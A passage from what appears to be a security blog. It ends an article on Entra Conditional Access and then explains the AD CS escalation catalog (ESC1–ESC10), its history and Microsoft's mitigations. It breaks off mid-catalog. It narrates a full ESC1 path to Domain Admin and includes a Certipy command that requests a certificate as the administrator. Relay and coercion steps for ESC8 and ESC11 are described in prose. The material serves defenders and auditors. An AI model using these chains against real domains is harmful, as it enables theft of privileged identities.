[@ms-graph-riskdetection]. Most sign-ins produce no `riskDetection`. Detection engineers querying for risk should join the Sign-in log with the riskDetections log and treat unjoined rows as "no risk flagged at the moment." No Microsoft primary source publicly describes the production model architecture or names a per-sign-in feature-vector size. What is published is the detection taxonomy (about two dozen named `riskEventType` values [@ms-id-protection-risks][@ms-graph-riskdetection]), the timing split (real-time / near-real-time / offline [@ms-risk-detection-types]), and the three-tier risk output. The "transformer with 80+ signals" framing is folk knowledge with no Microsoft primary source behind it. The article reframes it as "ML-based with detailed architecture publicly undisclosed." Not on its own. A standard MFA grant does not defeat a kit like Evilginx, which proxies both the password and the MFA challenge in real time. The defence is to require the *phishing-resistant Authentication Strength* in CA: FIDO2 with hardware attestation, Windows Hello for Business, or multifactor certificate-based authentication [@ms-auth-strengths]. The cryptographic origin-binding in WebAuthn-class credentials defeats AitM by construction. But the defence only works *when the grant is applied*. A CA policy that demands phishing-resistant for admin roles but not for users will block AitM against admins and not against users.

12. Two planes, one boundary

Replay Alice's Tuesday.

Identity Protection's signal plane scored her 09:02 sign-in. The score was below the medium-risk threshold. Conditional Access's policy plane evaluated four matching policies. Two demanded MFA; her cached refresh token already satisfied that grant from yesterday. One demanded a compliant device; Intune had marked her laptop compliant overnight. None demanded the block grant. The token issuer issued a CAE-aware bearer token with a 28-hour lifetime. Exchange Online accepted the token. Outlook's data path opened. Bytes returned to Alice.

If, twelve minutes later, an attacker tries to sign in with Alice's credentials from an anonymizing proxy, ID Protection will fire a detection. The detection will lift her user risk to high. CAE will deliver the high-user-risk event to Exchange. Exchange will issue a claims challenge on the next call from Alice's Outlook. Outlook will replay the challenge to Entra. Entra will re-run CA, see the elevated risk, demand step-up MFA, and either issue a fresh token (after Alice satisfies the step-up) or refuse.

The modern identity boundary is not a wall. It is a conversation between planes.

Key idea: The boundary is a conversation between planes, not a wall.

The open frontier is real. Agent identities want a richer grant taxonomy than the human one provides. Cross-vendor CAEP wants production receivers outside Microsoft. Workload-identity policy wants grants that go beyond block. The break-glass paradox wants an answer that does not depend on operational discipline. None of these problems will resolve in 2026. They are the next frontier.

What the reader should now be able to do: trace a sign-in through the signal, policy, token, and session planes; read a conditionalAccessPolicy JSON and predict the evaluation outcome; identify which class of attack each grant defends against; and name, by reference to specific Microsoft Learn pages, what CA does not defend against. The promise from Section 1 is delivered.

Today, 100 percent of consumer Microsoft accounts older than 60 days have multifactor authentication. -- Alex Weinert, Microsoft Identity, November 2023 [@weinert-2023-managed-policies]

Who decided this token is good? The boundary itself decided, by composing the work of every plane named above.

Certified Pre-Owned: AD CS and Active Directory's Second Trust Root

noreply@paragmali.com (Parag Mali) — Mon, 25 May 2026 00:00:00 GMT

**Microsoft Certificate Services shipped in Windows 2000 Server on February 17, 2000 and was renamed Active Directory Certificate Services in Windows Server 2008.** Its misconfigurations remained admin-tunable knobs without numbered names for twenty-one years. In June 2021, Will Schroeder and Lee Christensen at SpecterOps published *Certified Pre-Owned* and named eight of them ESC1 through ESC8. Through 2025 the community extended the catalog to ESC16 across IFCR, Compass Security, SpecterOps, TrustedSec, and independent researchers, each one abusing one of six primitives: the template, the issuing authority, the transport, the mapping, the authentication step, or the persistence substrate. Two ESCs have cleanly received CVE-class Microsoft patches (EKUwu / ESC15 -> CVE-2024-49019; ESC8 received KB5005413 *hardening guidance* rather than a CVE, and the adjacent Certifried CVE-2022-26923 patches the dNSHostName impersonation chain on the Machine template rather than a numbered ESC); the rest are administrative hardening matters per Microsoft's Windows Security Servicing Criteria. The KB5014754 strong-mapping rollout closed ESC9 and ESC10 but is bypassed by ESC16. The architectural property -- that every CA in NTAuth is a key parallel to krbtgt that can mint a Domain Admin authenticator -- is not closable by any patch. The operational playbook is to run Locksmith, BloodHound CE, MDI, PSPKIAudit, and Certipy in parallel, ingest CA logs, and prepare a Lane-3 CA rebuild before you need it.

1. Two Hours, No KRBTGT, No Touch on Tier Zero

The operator's stopwatch reads two hours and seven minutes when the SOCKS proxy lights up with a Ticket-Granting Ticket for the Domain Administrator account. No service was crashed. No LSASS process was touched. No Tier-Zero principal had its password reset. The krbtgt account hash from last quarter's rotation is still good. The certificate that minted the ticket was issued, signed, and logged by the enterprise's own Certificate Authority -- the one the IT director's slide deck calls "internal PKI" -- against a template the help desk uses to enroll Wi-Fi clients.

Walk the chain backwards. The operator joined Domain Users four hours ago via a phishing payload that never escalated past medium integrity. They ran one tool. Certipy find enumerated every certificate template the foothold account was permitted to enroll in [@certipy-gh]. One of those templates -- call it WiFi-Auth -- had three properties: low-privilege enrollment open to Authenticated Users, the Client Authentication Extended Key Usage attached, and the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit flipped on. Certipy req produced a Certificate Signing Request that supplied DOMAIN\Administrator as the Subject Alternative Name. The Enterprise CA, doing exactly what its template configured it to do, issued the certificate. Certipy auth -pfx exchanged the certificate for a TGT via the Public Key Cryptography for Initial Authentication extension to Kerberos. Mimikatz ptt loaded the TGT into the operator's session. Domain Admin.

What did not fire is the part that frustrates the incident response team. There was no Windows Event 4624 for the Administrator account anywhere on the domain. Microsoft Defender for Identity raised no lateral-movement alert. No Pass-the-Ticket detection triggered, because the ticket was minted as fresh PKINIT authentication, not replayed. The only artifact in the entire chain was a single Event ID 4886 in the CA's issuance log -- the event the SOC's SIEM does not ingest, because the SOC's SIEM was built to follow krbtgt and not to follow PKI.

RFC 4556's Public Key Cryptography for Initial Authentication in Kerberos. The protocol extension that lets a Kerberos client present a certificate to a Key Distribution Center and receive a Ticket-Granting Ticket in return. Authored by L. Zhu (Microsoft) and B. Tung (Aerospace), published in June 2006 [@rfc4556]. PKINIT is the authentication step that converts an issued certificate into a TGT, and therefore the step every ESC must cross to convert a misconfigured template into Domain Admin.

The TGT in this scenario is produced by Active Directory's Key Distribution Center after it validates the certificate against its trusted certificate stores. The KDC does not call back to the CA -- it trusts any certificate signed by a CA published into the forest's NTAuthCertificates container. That trust relationship is the load-bearing detail; we will return to it in section eight.

So how is any of this possible? The operator's organization rotated krbtgt twice last quarter, runs a top-quartile EDR product, and bought Microsoft Defender for Identity with the AD CS sensor add-on. The simple answer is: rotating krbtgt closes one of the keys that can mint a Domain Admin authenticator in this forest. It does not close the others. The forest has more than one such key, and nobody told the IR plan.

Key idea: Every domain whose CA can issue authentication certificates has two trust roots that can mint a Domain Admin authenticator, not one. The first is the krbtgt account hash. The second is the private key of any Certificate Authority published into the forest's NTAuthCertificates container. Rotating one does not touch the other. The catalog this article walks through is the community's attempt to enumerate the misconfigurations that turn the second trust root into a path low-privilege users can walk.

The vocabulary for this surface -- the named techniques, the numbered identifiers, the tool that enumerates them in eleven seconds -- did not exist until June 2021. The misconfigurations did. They had been shipping as customer-tunable knobs in Microsoft's identity stack since Windows Server 2003. If this surface has been available for twenty-one years, why did it take twenty-one years for someone to give the misconfigurations names?

2. Twenty-One Years of Unnamed Knobs

February 17, 2000. Windows 2000 Server reaches general availability. Microsoft Certificate Services -- the AD-integrated CA role -- ships as an optional server component on day one [@wikipedia-w2k]. The role is not yet called Active Directory Certificate Services; that rename arrives with Windows Server 2008. The shipping defaults that the operator in section one just exploited were already buildable on the 2000 release.

You will see both anchor dates in the literature. Semperis's CVE-2022-26923 retrospective writes that "In Windows Server 2008, Microsoft introduced AD CS" [@semperis-cve]. The Microsoft Learn current overview describes AD CS as a "Windows Server role for issuing and managing public key infrastructure (PKI) certificates" [@msl-adcs-current] without distinguishing the ship date from the rename date. This article uses the dual anchor: the role *shipped* in 2000 as Microsoft Certificate Services, and was *renamed* Active Directory Certificate Services in 2008. The misconfigurations the ESC catalog enumerates were enabled by Windows Server 2003's V2 templates and have not been default-off since.

The misconfigurations the catalog later attacks did not all arrive at once. Three Microsoft releases between 2000 and 2008 built the surface piece by piece.

Windows Server 2003 (general availability April 24, 2003 [@wikipedia-ws2003]) shipped Version 2 (V2) certificate templates, user and computer autoenrollment over the V2 schema, and the AD-stored template store [@msl-ws2003-ca]. Most of the surface ESC1 and ESC4 later attack first appears in this release: msPKI-Certificate-Name-Flag, the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit, per-template DACLs editable in Active Directory Sites and Services, and the modifiable Extended Key Usage list. The Enrollee-Supplies-Subject flag, in particular, is a customer-tunable bit; it ships off by default on the stock templates but is a one-click enable in certtmpl.msc [@msl-adcs-2012r2]. Microsoft's documentation warned against it on sensitive templates. It did not warn against it as a numbered identifier.

Certificate templates have version numbers tied to the Active Directory schema. V1 templates ship with Windows 2000 and are non-modifiable from the GUI. V2 templates ship with Windows Server 2003 and are fully modifiable; they introduce the per-template DACL and the editable msPKI-Certificate-Name-Flag properties the catalog attacks. V3 templates ship with Windows Server 2008 and add Suite B cryptography support. The catalog mostly attacks V2 templates; ESC15 specifically attacks the residual V1 templates that ship pre-installed and cannot be removed.

Windows Server 2008 (general availability February 27, 2008 [@wikipedia-ws2008]) renamed the role to Active Directory Certificate Services and added new role services: Online Certificate Status Protocol Responder, Network Device Enrollment Service, Certificate Enrollment Web Service, and Certificate Enrollment Policy Web Service. These role services expanded the transport surface that ESC8 and ESC11 later attack. The Windows Server 2012 R2 documentation page hh831740 became the canonical reference SpecterOps later linked from the 2021 paper [@msl-adcs-2012r2].

Between 2008 and 2021 Microsoft published hardening guidance for AD CS in several places -- Test Lab Guides, PKI design pages, role-service deployment docs [@msl-pki-design]. The guidance covered template ACLs, manager approval, least-privilege enrollment, and the Enrollee-Supplies-Subject bit. It did not assign numbered identifiers to specific dangerous combinations. It did not appear in MSRC's vulnerability pipeline. It did not get a Common Vulnerabilities and Exposures registration. The configurations were documented but unnamed.

In 2019, two seeds for the named class appeared. Géraud de Drouas at the French ANSSI published a brief GitHub note that the Active Directory Public-Information property set includes altSecurityIdentities, which lets an attacker with that permission map their own certificate onto a privileged user [@dedrouas-altsec]. The note ends with a striking line: "This issue has been responsibly disclosed to MSRC and received a 'won't fix' response." The same year Microsoft began documenting the szOID_NTDS_CA_SECURITY_EXT extension in certificate-related KBs, though without making it default-on. The substrate for what would become ESC9, ESC10, and ESC14 was already in place; nobody had named it yet.

Twenty-one years from the role's ship date, then. Twenty-one years of admin-tunable knobs. No numbered identifiers, no patch cadence, no scanner enumeration, no MSRC pipeline. Microsoft documented every one of these settings individually, often well; what was missing was the catalog. Hardening guidance without numbered identifiers produces no defensive prioritization in real enterprises, because enterprise security programs prioritize against catalogs, not against documentation pages [@bollinger-ekuwu]. So what happened in June 2021 that turned a documentation pattern into a catalog?

flowchart LR A[2000
Microsoft Certificate Services
ships in Windows 2000 Server] --> B[2003
V2 templates
and autoenrollment] B --> C[2008
Role renamed
Active Directory
Certificate Services] C --> D[2019
de Drouas notes
altSecurityIdentities abuse] D --> E[June 2021
SpecterOps catalog
ESC1 through ESC8] E --> F[2021 to 2022
KB5005413
CVE-2022-26923
KB5014754] F --> G[2022 to 2023
ESC9 to ESC12
from Lyak Heiniger Knobloch] G --> H[2024
ESC13 to ESC15
Knudsen and Bollinger
CVE-2024-49019] H --> I[2025
ESC16
strong-mapping full enforcement]

3. Six Primitives Every ESC Abuses

Before opening the catalog, install the vocabulary. Every ESC -- without exception -- abuses one of six primitives: the template, the issuing authority, the enrollment transport, the certificate mapping, the authentication bridge, and the persistence substrate. Once you have these six names in your head, the sixteen ESCs compose into a small grid.

The Template

A certificate template is an Active Directory object stored in the CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration partition that tells an Enterprise CA what kind of certificate to issue and to whom. Templates carry their own DACL controlling who can enroll, who can write, and who can autoenroll. They carry a msPKI-Certificate-Name-Flag attribute whose bits control how the Subject and Subject Alternative Name fields are populated. They carry an Extended Key Usage list that names what the certificate is permitted to do. And they carry a Manager Approval bit that gates whether issuance is automatic or whether a CA officer must approve each request [@msl-adcs-2012r2].

The Active Directory-stored object specifying who can request what kind of certificate from an Enterprise CA. Templates carry per-object DACLs (enrollment, autoenrollment, write), a `msPKI-Certificate-Name-Flag` controlling Subject and SAN behavior, an Extended Key Usage list, and a Manager Approval bit. V1 templates (Windows 2000) are non-modifiable; V2 templates (Windows Server 2003) are fully modifiable; V3 templates (Windows Server 2008) add Suite B cryptography.

ESC1, ESC2, ESC3, ESC4, and ESC15 all attack the template. They differ only in which template property is misconfigured. (ESC9 also begins on a template flag, CT_FLAG_NO_SECURITY_EXTENSION, but its effect lives in the mapping layer; we file it under mapping below, matching SpecterOps's own Certify taxonomy [@specterops-certify-docs-index].)

The Issuing Authority

An Enterprise CA is a Windows Server role service that signs certificate requests against published templates. To be trusted for authentication, the CA must be published into the forest's NTAuthCertificates container. That container is the single list of CA certificates the Key Distribution Center trusts for PKINIT. The CA carries its own security descriptor controlling who can enroll, who can manage certificates, and who can manage the CA itself. It carries two registry flags that change its issuance behavior: EDITF_ATTRIBUTESUBJECTALTNAME2, which permits requesters to specify arbitrary Subject Alternative Names, and IF_ENFORCEENCRYPTICERTREQUEST, which controls whether RPC enrollment requires packet privacy [@compass-esc11]. The 2022 KB5014754 patch introduced szOID_NTDS_CA_SECURITY_EXT, a Microsoft-specific extension carrying the requester's Security Identifier; that extension is the load-bearing artifact of the strong-mapping enforcement track [@kb5014754].

The AD-integrated certificate authority role in AD CS. Publishes certificate templates into Active Directory, processes certificate requests against those templates, and signs issued certificates with its private key. To be trusted for Windows authentication, the CA's certificate must be present in the forest-wide `NTAuthCertificates` container. The AD-published container `CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration` listing CA certificates trusted by the Key Distribution Center for client authentication. Any certificate signed by a CA in this container can, given a valid mapping, mint a Kerberos Ticket-Granting Ticket. Publishing a CA into NTAuth is the moment that CA's private key becomes a trust root parallel to krbtgt.

ESC5, ESC6, ESC7, and ESC16 attack the issuing authority itself -- its DACL, its registry flags, its extension policy. (ESC11's RPC packet-privacy gap is a CA-side configuration, but its abuse is an NTLM relay; we group it with ESC8 under transport, matching the §5 diagram.)

The Enrollment Transport

A certificate is requested over a network protocol. The default transport is DCOM/MS-WCCE -- the Windows Client Certificate Enrollment protocol, an RPC-based interface that ships enabled on every Enterprise CA [@ms-icpr-spec]. Additional transports ship as separate role services: HTTP Web Enrollment (IIS-based, with NTLM auth by default), the Certificate Enrollment Web Service (web service, supports basic and Kerberos), the Network Device Enrollment Service (the SCEP gateway), and the Certificate Enrollment Policy Web Service. Each transport is a network attack surface for relay primitives that route a coerced NTLM authentication into a certificate request.

ESC8 attacks the HTTP Web Enrollment transport. ESC11 attacks the RPC transport. Both are NTLM-relay attacks; they differ only in which transport the relayed authentication targets.

The CA's security model distinguishes two rights that look similar but differ in scope. Issue and Manage Certificates permits the holder to approve pending requests, revoke issued certificates, and read the request store. Manage CA permits the holder to edit the CA's own configuration -- including its registry-controlled extension policy and its DACL. ESC7 attacks the latter. The escalation chain that follows ESC7 typically pivots to ESC4 (edit a template) or to issuing a certificate directly via a CA officer's request-approval right.

The Certificate Mapping

When a CA issues an authentication certificate, the certificate identifies a principal -- a user or a computer. The Key Distribution Center has to decide which Active Directory principal that certificate represents. Two mappings exist. Implicit mapping reads the Subject Alternative Name (or the Subject, on older templates) and looks up the principal by User Principal Name. Explicit mapping reads the AD principal's own altSecurityIdentities attribute, which holds one or more X.509 issuer/serial expressions [@dedrouas-altsec]. The May 2022 KB5014754 patch redefined which mappings the KDC accepts: explicit mappings using X509IssuerSerialNumber, X509SKI, or X509SHA1PublicKey are strong; everything else is weak and will be rejected once Full Enforcement is active [@kb5014754].

OID 1.3.6.1.4.1.311.25.2. The Microsoft certificate extension introduced by KB5014754 that embeds the SID of the requesting Active Directory principal directly into the issued certificate. When present, the KDC matches the certificate against the principal whose SID is embedded, defeating SAN-supply attacks like ESC1. The extension is the load-bearing mechanism of strong mapping enforcement. Per KB5014754, explicit `altSecurityIdentities` entries using the `X509IssuerSerialNumber`, `X509SKI`, or `X509SHA1PublicKey` formats are *strong*. All other formats -- including implicit UPN and SAN matching -- are *weak* and rejected once Full Enforcement mode is active (February 11, 2025 default; legacy-mapping registry override removed September 9, 2025) [@kb5014754]. The strong-mapping track was the single largest Microsoft mitigation of the ESC era.

ESC9, ESC10, ESC13, and ESC14 all attack the mapping. They abuse the gap between what a certificate asserts and which AD principal the KDC binds it to.

The Authentication Step

This component is the part of Windows that turns a certificate into an authenticator. For Kerberos, the protocol is PKINIT (RFC 4556 [@rfc4556]): client presents a cert, KDC validates the cert and the mapping, KDC issues a TGT. For TLS-based services -- LDAPS, RDP with smart card, IIS with client cert -- the protocol is Schannel. For the legacy smart-card pipeline, the path is the combination of the Smart Card Resource Manager and PKINIT.

No ESC attacks this step directly. Every ESC must cross it to convert a misconfigured template, ACL, or mapping into a usable authenticator. The authentication step is the choke point; it is also the point Microsoft has reshaped most heavily with KB5014754.

The Persistence Substrate

An issued certificate is not a transient credential. It is a signed authenticator with a configurable validity period (one year is common, ten years is permitted). The certificate authenticates the embedded principal as long as the certificate is valid and not revoked. That property is what the SpecterOps paper's DPERSIST and THEFT classes attack [@cpo-blog]. UnPAC-the-Hash recovers the NTLM hash from a PKINIT-issued TGT, giving the attacker a password-equivalent credential they did not previously have. The Golden Certificate attack steals the CA's own private key, granting forever-issuance against the entire forest.

This article scopes those attacks to a sidebar; the body walks the ESC1 to ESC16 escalation catalog. But every ESC ends in the persistence substrate: the certificate the attacker walks out with is the receipt that survives password rotation.

Note: A primitive is a Microsoft-shipped knob, flag, ACL, or protocol that, when misconfigured, becomes part of an escalation. An exploitation chain is the specific sequence of operator actions that turns one or more misconfigured primitives into a Domain Admin authenticator. ESCs are exploitation chains, not primitives. ESC1, for example, abuses the template primitive's CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit, combined with the bridge primitive (PKINIT), to produce the authenticator. The catalog enumerates chains; the six categories above enumerate the substrate.

Now that the vocabulary is in place, sixteen named attacks compose neatly onto a 6 by 16 grid. Here is the moment they did.

flowchart TD T[Template
per-template DACL
Name-Flag bits
EKU list
Manager Approval] A[Issuing Authority
NTAuth membership
CA security descriptor
EDITF flags
extension policy] X[Enrollment Transport
RPC/MS-WCCE
HTTP Web Enrollment
CES/CEP
NDES/SCEP] M[Certificate Mapping
implicit UPN/SAN
explicit altSecurityIdentities
strong vs weak
SID extension] B[Authentication Bridge
PKINIT for Kerberos
Schannel for TLS
smart-card pipeline] P[Persistence Substrate
validity period
UnPAC-the-Hash
Golden Certificate
CRL bypass] T --> A A --> X X --> B A --> M M --> B B --> P

4. Certified Pre-Owned

Will Schroeder pushes the SpecterOps Medium post live on June 17, 2021. (A revision tagged [EDIT 06/22/21] follows the next week; the literature settles on "June 2021" as the canonical date [@cpo-blog].) The whitepaper PDF drops in the same window and is rehosted on the SpecterOps domain the following year [@cpo-whitepaper]. Seven weeks later, on August 5, Schroeder and Christensen present Certified Pre-Owned: Abusing Active Directory Certificate Services at Black Hat USA 2021. Three GhostPack tools ship to GitHub on schedule: PSPKIAudit for defense [@pspkiaudit-gh], Certify for offense [@certify-gh], and ForgeCert for Golden Certificate work.

The paper names eight escalation paths and three persistence and theft prefixes:

ESC1 through ESC8 -- escalation paths from a low-privilege foothold to Domain Admin
DPERSIST -- domain persistence via forged certificates after CA private-key compromise
THEFT -- certificate and credential theft primitives, including the UnPAC-the-Hash technique
DETECT -- defensive detection primitives the team mapped to each abuse

The contribution was not the discovery of new individual primitives. Most of the individual misconfigurations had appeared in Microsoft's hardening guidance or in scattered community posts well before the paper. ENROLLEE_SUPPLIES_SUBJECT had been a documented warning for a decade. NTLM relay to IIS had been a known attack class since at least 2008. The EDITF_ATTRIBUTESUBJECTALTNAME2 flag was a documented option in certutil since Windows Server 2008 R2. What the paper contributed was the unified catalog -- numbered identifiers, reproducible exploitation, a tool that enumerated each path, and a single document tying every abuse to its primitive and its mitigation.

While AD CS is not installed by default for Active Directory environments, from our experience in enterprise environments it is widely deployed, and the security ramifications of misconfigured certificate service instances are enormous. -- Will Schroeder and Lee Christensen, *Certified Pre-Owned* (June 2021) [@cpo-blog]

Microsoft's response was uncharacteristically fast. KB5005413 published in late July 2021 -- roughly six weeks after the blog -- recommending Extended Protection for Authentication and "Require SSL" on the AD CS Web Enrollment and Certificate Enrollment Web Service role services [@kb5005413]. The KB closes ESC8 over HTTPS when EPA is enabled. It does not close ESC1 through ESC7, and it does not close ESC11 (which had not yet been named).

The "ESC" prefix is an acronym for escalation. The catalog uses three sibling prefixes from the same paper: DPERSIST for domain persistence, THEFT for credential and certificate theft, and DETECT for defensive detection identifiers. ESC numbering is consecutive but not contiguous in time -- ESC12 (a hardware substrate attack) was disclosed by Knobloch in October 2023 [@knobloch-esc12] [@knobloch-esc12-archive], four months before Knudsen disclosed ESC13 and ESC14 from SpecterOps. The numbering tracks the order of community disclosure, not a planned roadmap.

Here is the observation that this article will load-bear: the breakthrough was naming, not discovery. Until SpecterOps named the eight configurations, every one of them had been documented somewhere in Microsoft Learn or in a community blog. The hardening documentation had existed for years and had produced essentially no defensive prioritization in real enterprises. Microsoft Defender for Identity did not flag ESC1 templates. BloodHound did not graph ESC4-shaped DACLs. SIEMs did not ingest CA Event ID 4886. No commercial scanner shipped a rule for the Enrollee-Supplies-Subject bit. The reason was not that the information was inaccessible. The reason was that the configurations had no names -- and an enterprise security program cannot prioritize against an unnamed configuration.

Key idea: Naming is itself a defensive primitive. The 2021 SpecterOps catalog converted twenty-one years of unnamed admin-tunable knobs into a numbered backlog that scanners could enumerate, BloodHound could path-find, MSRC could patch, and operators could prioritize. Every subsequent mitigation generation -- KB5005413, CVE-2022-26923, KB5014754, CVE-2024-49019, BloodHound CE ADCS edges, Locksmith, Microsoft Defender for Identity's posture assessments -- builds on the catalog rather than on the underlying hardening documentation. The catalog is the security primitive; the patches are downstream of the catalog.

Eight ESCs in 2021. Within fifteen months, two researchers extended the catalog past the original boundary: Oliver Lyak at the Institute For Cyber Risk added ESC9 and ESC10 in August 2022 [@lyak-certipy-4-archive]; Sylvain Heiniger at Compass Security added ESC11 in November 2022 [@compass-esc11]. Hans-Joachim Knobloch added ESC12 in October 2023 [@knobloch-esc12]. SpecterOps's Jonas Bülow Knudsen added ESC13 in February 2024 [@knudsen-esc13] and ESC14 two weeks later [@knudsen-esc14]. Justin Bollinger at TrustedSec added ESC15 in October 2024 [@bollinger-ekuwu]. Lyak named ESC16 in 2025 against a workaround Schroeder himself had documented in 2022 [@specterops-esc16-docs]. Sixteen ESCs by the time you read this. Here is what each one does.

5. The Catalog: ESC-1 through ESC-16

Of the sixteen named ESCs, the original eight name the surface; ESC9 through ESC16 name the residual after every Microsoft mitigation shipped to date. We walk them in primitive-grouped order, following the same taxonomy the SpecterOps Certify documentation uses: template misconfigurations, access-control vulnerabilities, CA configuration issues, certificate mapping issues, and one hardware-substrate sidebar [@specterops-certify-docs-index].

Template misconfigurations: ESC1, ESC2, ESC3

ESC1 -- Misconfigured Certificate Template. A V2 template that lets a low-privilege principal enroll, has Client Authentication in its Extended Key Usage list, has CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set, and does not require Manager Approval. The attacker requests a certificate naming the target principal in the Subject Alternative Name; the CA issues; the certificate maps via UPN to the target; PKINIT produces a TGT as the target. One operator chain: certipy req -u user -p pass -ca CA -template VulnTemplate -upn administrator@domain.local. First disclosed by SpecterOps in June 2021 [@cpo-blog]. BloodHound CE edge: ADCSESC1 [@bh-esc1-edge].

The `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` bit in `msPKI-Certificate-Name-Flag`. When set, the requester is allowed to supply the Subject or Subject Alternative Name in the CSR rather than having the CA build the Subject from the requester's own AD attributes. This is the load-bearing primitive of ESC1. ```powershell Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)" -Filter * -Properties msPKI-Certificate-Name-Flag, pKIExtendedKeyUsage, msPKI-Enrollment-Flag | Where-Object { ($_.'msPKI-Certificate-Name-Flag' -band 0x1) -ne 0 -and ($_.'msPKI-Enrollment-Flag' -band 0x2) -eq 0 -and ($_.pKIExtendedKeyUsage -contains '1.3.6.1.5.5.7.3.2') } | Select-Object Name ``` The query lists templates with ESS set, no manager approval, and Client Authentication EKU. Locksmith, PSPKIAudit, and Certipy all run a logically equivalent check; this is the smallest reproducible form for an audit script that does not depend on a vendor tool.

ESC2 -- Any-Purpose or Subordinate CA EKU. A template that grants the Any-Purpose EKU (2.5.29.37.0) or the Subordinate CA EKU permits the certificate to be used for arbitrary purposes, including subordinate CA work. The attacker enrolls and then forges new certificates against the issued certificate's keypair. First disclosed by SpecterOps, June 2021 [@cpo-blog]. No BloodHound CE edge; the abuse pattern lives in Certify and Certipy [@certipy-wiki-priv].

ESC3 -- Enrollment Agent Template. A template with the Certificate Request Agent EKU lets the holder enroll certificates on behalf of other users. Combined with a second template flagged "Enrollment Agent" the attacker can request a certificate naming any principal. The chain is two requests rather than one. SpecterOps, June 2021 [@cpo-blog]. BloodHound CE edge: ADCSESC3.

Access-control vulnerabilities: ESC4, ESC5, ESC7

ESC4 -- Vulnerable Certificate Template ACL. Any principal with GenericAll, GenericWrite, WriteOwner, or WriteDacl on a template can modify the template into an ESC1-shaped configuration and then enroll. This converts a write right on a template object into Domain Admin. SpecterOps, June 2021 [@cpo-blog]. BloodHound CE edge: ADCSESC4.The ADCSESC4 edge composes with BloodHound's general DACL graph, so a Domain Users principal that holds WriteDacl on a sensitive template inherits the path automatically without a hand-written query. The edge composes naturally with the rest of BloodHound's principal-DACL graph -- a Domain Users principal with WriteDacl on the template inherits the path.

ESC5 -- Vulnerable PKI Object ACL. The same class of write rights on the CA computer object, the NTAuthCertificates container, or the AIA container. Compromising any of these gates the entire AD CS substrate. SpecterOps, June 2021 [@cpo-blog]. No BloodHound CE edge today; the surface is wide and the operator chain depends on the specific object compromised.

ESC7 -- Vulnerable CA ACL. A principal with the Manage CA right on the Enterprise CA can edit its registry-controlled configuration (including the EDITF_ATTRIBUTESUBJECTALTNAME2 flag, which converts the CA into a global ESC6 condition). A principal with Issue and Manage Certificates can approve their own otherwise-blocked certificate requests. SpecterOps, June 2021 [@cpo-blog]. No BloodHound CE edge; the abuse is a CA-side write rather than an AD principal-graph relationship.

CA configuration issues: ESC6, ESC8, ESC11

ESC6 -- EDITF_ATTRIBUTESUBJECTALTNAME2 on the CA. When this CA-wide flag is set, every certificate request can specify an arbitrary Subject Alternative Name regardless of the template's Name-Flag bits. The CA becomes globally ESC1-shaped against any template the attacker can enroll into. SpecterOps, June 2021 [@cpo-blog]. BloodHound CE edges: ADCSESC6a and ADCSESC6b (the latter for cases where the CA also disables the SID extension).

ESC8 -- NTLM Relay to AD CS HTTP Web Enrollment. The AD CS Web Enrollment role service ships with NTLM authentication enabled and, by default, no Extended Protection for Authentication. An attacker who can coerce a target computer to authenticate (PetitPotam, PrinterBug, DFSCoerce) can relay that authentication to the CA's /certsrv/ endpoint, request a certificate naming the relayed principal, and walk away with a certificate impersonating the coerced computer -- including Domain Controllers. SpecterOps, June 2021 [@cpo-blog]. BloodHound CE graphs this as the CoerceAndRelayNTLMToADCS edge [@bh-coerce-adcs-edge]: a Group-to-Computer edge whose source is Authenticated Users and whose destination is the coerced target computer, with the edge's evaluation conditioned on at least one ESC8-vulnerable Web Enrollment endpoint being reachable on the network.

Note: ESC8 needs no template misconfiguration. It needs a CA with HTTP Web Enrollment role service installed -- common in environments that ever provisioned smart cards or did web-based renewal -- and at least one computer account the attacker can coerce. Microsoft mitigated it with KB5005413 in July 2021 [@kb5005413], but the mitigation is configuration guidance (EPA on, "Require SSL" on, Web Enrollment disabled if unused), not a binary patch. Environments that never enabled EPA on /certsrv/ remain exploitable today. The "Domain Users to Domain Admin in eight minutes" demos that pepper conference talks are usually ESC8 demos.

ESC11 -- NTLM Relay to ICPR/RPC. The ICertPassage RPC interface (the default enrollment transport on every Enterprise CA) enforces packet privacy when the IF_ENFORCEENCRYPTICERTREQUEST flag is set; that flag has been on by default since Windows Server 2012. However, because the flag breaks certificate enrollment for legacy Windows XP clients, Compass Security observed real-world environments where administrators had explicitly removed the flag for compatibility, leaving the RPC enrollment surface unencrypted. When packet privacy is not enforced, an attacker can relay a coerced NTLM authentication into the CA's RPC interface and obtain a certificate impersonating the coerced principal. Disclosed by Sylvain Heiniger at Compass Security, November 2022 [@compass-esc11]. The SpecterOps Certify documentation describes the misconfiguration as "an insufficiently protected certificate authority RPC interface" [@specterops-esc11-docs]. No BloodHound CE edge; the RPC transport is below the principal-graph model.

Certificate mapping issues: ESC9, ESC10, ESC13, ESC14, ESC15, ESC16

ESC9 -- No Security Extension. A template flagged CT_FLAG_NO_SECURITY_EXTENSION instructs the CA to issue certificates without the szOID_NTDS_CA_SECURITY_EXT SID embedding. KB5014754's strong-mapping enforcement then falls back to weak UPN mapping, and the attacker can rename a controlled user account to match a privileged user's UPN, enroll, and authenticate as that privileged user. Disclosed by Oliver Lyak at IFCR on August 4, 2022, twelve weeks after KB5014754 [@lyak-certipy-4-archive]. BloodHound CE edges: ADCSESC9a and ADCSESC9b.

ESC10 -- Weak Certificate Mapping. The registry values StrongCertificateBindingEnforcement (on KDCs) and CertificateMappingMethods (on Schannel servers) control whether weak mappings are accepted. In Compatibility mode (the KB5014754 staged-rollout default through February 11, 2025), weak mappings still pass. An attacker who can write altSecurityIdentities on a target, or who can engineer a weak UPN match, authenticates as the target. Same disclosure: Lyak, August 4, 2022 [@lyak-certipy-4-archive]. BloodHound CE edges: ADCSESC10a and ADCSESC10b.

